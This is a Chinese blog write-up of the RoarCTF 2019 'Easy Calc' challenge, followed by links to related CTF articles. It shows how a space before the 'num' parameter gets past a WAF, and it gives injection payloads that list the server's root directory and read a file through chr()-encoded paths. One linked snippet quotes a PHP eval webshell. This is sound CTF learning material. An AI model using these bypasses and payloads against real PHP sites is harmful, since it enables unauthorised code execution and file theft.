一天一道CTF 第十天 (PHP字符串解析特性绕过)

最新推荐文章于 2024-08-10 10:43:13 发布
最新推荐文章于 2024-08-10 10:43:13 发布
阅读量384 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/scrawman/article/details/114765172
版权

前面几天因为做战队大佬出的题耽误了,今天开始继续
[RoarCTF 2019]Easy Calc
直接查看源码发现有一个calc.php文件,URL后面加/calc.php直接就进去了
在这里插入图片描述
在这里插入图片描述
解法一:
那么在这里我们就可以传递num参数,这里有两个难点:一个是WAF只允许num传入数字,另一个是preg_match过滤了很多字符。
前一个我们可以在num前面加空格绕过,应用的是PHP的字符串解析特性,waf会将" num"和"num"识别为两个不同的变量,但是PHP在解析字符串的时候会将空格自动去掉。
所以最后的payload是http://node3.buuoj.cn:25815/calc.php?%20num=1;var_dump(scandir(chr(47)))
var_dump显示所有类型的结果,scandir扫描文件夹,scandir("/")是扫描目录下的所有文件夹。我们能够找到一个flagg文件。
在这里插入图片描述
http://node3.buuoj.cn:25815/calc.php? num=1;var_dump(file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103)))读取flagg的内容。这道题目还可以用http走私来解,明天再看。

https://blog.csdn.net/a3320315/article/details/102937797
http走私的漏洞我没有复现成功,贴一个师傅的writeup在这里,可能跟版本也有关系

scrawman
关注
[网络安全自学篇] 八十.WHUCTF之WEB类解题思路WP(代码审计、文件包含、过滤绕过、SQL注入)
杨秀璋的专栏
05-29 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了Windows PE病毒, 包括PE病毒原理、分类及感染方式详解,并通过案例进行介绍。这篇文章将介绍WHUCTF部分题目,第一次参加CTF,还是能学到很多东西。下面分享四个我完成的WEB类型题目的解题过程,希望对您有所帮助。本来感觉能做出6道题目,但有两道题卡在某个点,后面几天忙于其他事情,就没再参加。人生路上,要珍惜好每一天与家人陪伴的日子。感谢武汉大学,感谢网安学院,感谢这些大佬
写一下自已对ctf的了解,以便日后自已需要
m0_50987622的博客
11-07 6026
11.7 本人ctf小白,参加比赛基本处于摸鱼状态,也没有系统了解过ctf以及做过相关的实践和练习,但是,对这一块比较感兴趣,所以,只能说,在学习中,就跟我当初学makefile一样,做下记录,写点自已觉得对自已有用的东西,大概这样。 ctf总共分为五部分,misc杂项,crypto解密加密,pwn攻破设备、系统,reverse逆向渗透,web网络安全。500pt的题都很难。 首先,建立在你对前后端足够了解的基础上。 web安全就是黑服务器,pwn就是黑设备黑系统,至于怎么黑,仁者见仁智者见智,取决
CTF-scandir()
mr__sheng的博客
09-11 312
calc.php?num=1;
PHP字符编码绕过漏洞总结
weixin_30535843的博客
08-22 275
其实这东西国内少数黑客早已知道,只不过没有共享公布而已。有些人是不愿共享,宁愿烂在地里,另外的一些则是用来牟利。 该漏洞最早2006年被国外用来讨论数据库字符集设为GBK时,0xbf27本身不是一个有效的GBK字符,但经过addslashes() 转换后 变为0xbf5c27,前面的0xbf5c是个有效的GBK字符,所以0xbf5c27会被当作一个字符0xbf5c和一个单引号来处...
PHP一些函数绕过总结
最新发布
weixin_52230368的博客
08-10 1013
可以引入\f(也就是%0c)在数字前面,来绕过最后那个is_palindrome_number函数,而对于前面的数字判断,因为intval和is_numeric都会忽略这个字符,所以不会影响。同理,intval(” \r\n \t 12″),也会正常返回12。的文字这样输出会出现乱码情况第一个参数是你文本的编码第二个参数是你要转换的文本格式第三个是你要转换的文本使用之后把返回结果赋值给。这里用的是strcmp()函数,这个函数是用于比较字符串的函数,但是倘若他收到一个数组形式的数据时,这个函数将发生错误。
php 字符查询_使用PHP查询字符串绕过waf
weixin_31308407的博客
03-09 175
声明由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,雷神众测以及文章作者不为此承担任何责任。雷神众测拥有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经雷神众测允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。No.1语法&定义&注释查询字符串解析到变量,首先看一下pars...
使用PHP查询字符串可以绕过waf吗?
yihuliunian的博客
06-16 191
转载自品略图书馆http://www.pinlue.com/article/2020/06/1515/0310739850631.html 使用PHP查询字符串绕过waf No.1 语法&定义&注释 查询字符串解析到变量,首先看一下parse_str()函数:语法:parse_str(string,array) 定义和用法: parse_str() 函数把查询字符串解析到变量中。注释: 如果未设置 array 参数,则由该函数设置的变量将覆盖已存在的同名变量。注释: ..
PHP字符串解析特性 ($GET/$POST参数绕过)(含例题 buuctf easycalc)
bin789456的博客
09-20 2519
了解一下 PHP需要将所有参数转换为有效的变量名,因此在解析查询字符串时,它会做两件事: 1)删除空白符 2)将某些字符转换为下划线(包括空格) 例如: 下面这个图就是测试出来在能够哪些地方添加并得到特殊处理。 通过以上特性,当waf限制get参数类型或者长度等等,我们就可以很轻松的绕过。 参考链接:https://www.freebuf.com/articles/web/213359.html 例题 buuctf-easycalc 打开题目,查看源代码 提示中显示有WAF,同时有一个检验函数,有一个
第二十天 CTF初识
weixin_46653764的博客
06-26 757
一、记下一些不知道的小知识 (1)常见的备份文件后缀名有: .git .svn .swp .svn .~ .bak .bash_history 而 php的备份有两种:****.php~和.php.bak (2)去了解php的弱类型 (3)
第七天文件上传漏洞
代码审计
03-10 617
tampr脚本和文件上传-tampr脚本1.1 -tampr脚本简介1.2 如何用 --tamper脚本1.3查看SQLMAP调用tamper脚本文件space2comment.py的过程2 文件上传漏洞2.1 什么是文件上传漏洞2.2什么是webshell2.3产生文件上传漏洞的原因3 文件上传漏洞的攻击方式3.1 uplod -- pass-01 前端限制3.2 uplod -- pass-02 ['upload_file']['type'] 绕过3.3 uplod -- pass-03
WAF绕过的各种方法总结.pdf
07-09
WAF绕过的各种方法总结总结语2019年7月9日,仅供学习参考,请勿用于非法用途
N1CTF WEB WriteUp
heySister
03-13 4423
77777 作为一个小白,瑟瑟发抖地选择了这道被解出次数最多的题目….emmm…还是有一些收获的。 首先题目给出了一些代码和一些信息: 信息是关于安装配置虚拟机的…和我之前配置环境的步骤,指令差不多…感觉应该没什么问题,就只是告诉我们服务器上有这个东西。 给出的代码就比较关键了。而且题目About 里说可以修改points ,告诉我们flag 是admin's password...
CTF-PHP常见考点实例小结
告白的博客
11-13 3776
0x00 CTF-PHP常见考点 1.php弱类型的比较 2.php断言问题 3.php读取文件 4.preg_match绕过 5.sha1()函数与md5() 6.异或注入绕过 7.updatexml()函数考点 8.命令执行绕过:https://www.cnblogs.com/iloveacm/p/13687654.html 9.源文件泄露 10.extract变量覆盖 11.strcmp漏洞 … 参考网上师傅的总结,感觉不错值得学习:https://www.cnblogs.com/iloveacm
php判断某变量的 set 与get 方法是否存在类_CTF小白入门-PHP语言特性(一)
weixin_39769039的博客
01-24 92
CTF比赛中,PHP、JavaScript、python 三类语言最为常见,其中PHP占据了80%以上。因此部分CTF题中,考察了 PHP语言特性的一些内容,本文中针对PHP语言特性CTF 考点进行讲解和总计。弱类型PHP语言中,有两个比较是否相等的符号,分别是 “==”和“===”。其中,“==”在判断两个值是否相等前,将自动将两个变量类型转化为同一数据类型,然后进行比较。“===”先比较...
php中get,post传值的对照
weixin_43553654的博客
01-26 800
在目前我经历的一些ctf,awd比赛中,用的最多的两种传参方式就是get,post这两种 1. GET是从服务器上获取数据,POST是向服务器传送数据。2. GET是把参数数据队列加到提交表单的ACTION属性所指的URL中,值和表单内各个字段一一对应,在URL中可以看到。POST是通过HTTP POST机制,将表单内各个字段与其内容放置在HTML HEADER内一起传送到ACTION属性所指的U...
CTF萌新日记——绕过
qq_45427131的博客
07-19 1032
CTF萌新日记——绕过
BUUCTF 6
qq_52431855的博客
01-19 212
知识点 一句话木马结构:<?php @eval($_POST['attack']) ?> render:python中的一个渲染函数,渲染变量到模板中,即可以通过传递不同的参数形成不同的页面。 SSIT:SSTI就是服务器端模板注入(Server-Side Template Injection),也给出了一个注入的概念。详情可见该博客。 tornado:Tornado龙卷风是一个开源的网络服务器框架,它是基于社交聚合网站FriendFeed的实时信息服务开发而来的。 6-1 做题思路
Bugku CTF-web3 GET型传参
weixin_44023403的博客
04-17 2022
前言:最近开始接触bugku,感觉适合新人培养兴趣。自己在学习的时候写个笔记,督促自己多去学习和巩固知识。如果文章和代码有表述不当之处,还请大佬不吝赐教。 Bugku CTF-web2 GET型传参基础知识解题 基础知识 HTTP的GET请求: 从指定的资源请求数据。 HTTP的GET请求方式: GET提交的数据会放在URL之后,以?分割URL和传输数据,参数之间以&相连,如和http://XXXX.com?name=test1(参数1)&id=123456(参数2)。 解题 查看P
CTF漏洞分析:格式化字符串、竞争条件与代码逻辑漏洞解析
"本资源主要探讨了CTF(Capture The Flag)比赛中的几种常见漏洞,包括格式化字符串漏洞、竞争条件漏洞、代码逻辑漏洞和类型混淆漏洞。通过讲解和实例,帮助学习者理解和掌握这些安全问题,以提高网络安全攻防能力。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值